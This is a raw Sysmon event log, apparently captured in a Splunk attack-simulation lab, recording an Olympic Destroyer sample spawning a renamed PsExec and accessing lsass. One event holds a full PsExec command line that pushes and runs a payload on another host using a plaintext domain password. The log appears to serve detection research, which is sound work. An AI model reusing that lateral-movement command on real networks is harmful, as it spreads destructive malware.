10:56:50.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.166{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.145{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.145{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.152{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.145{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AB05-000000003802}6256C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.145{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.129{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.129{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:50.129{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.082{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AA05-000000003802}5620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.082{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F2-6216-AA05-000000003802}5620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.070{C8EA50B7-12F2-6216-AA05-000000003802}56205592C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.045{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F2-6216-AA05-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000291552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.538{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53609-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000291551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.029{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F2-6216-AA05-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.998{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.998{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.982{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.973{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F3-6216-B205-000000003802}6404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.973{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F3-6216-B205-000000003802}6404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EBA292FDE2F229AF3244701B23E3C0,SHA256=9D2E25A5B2409D38233E5DEFE0D32C8878BFBCCA73D1048D39323B6CDDF30657,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12F3-6216-8704-000000003902}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 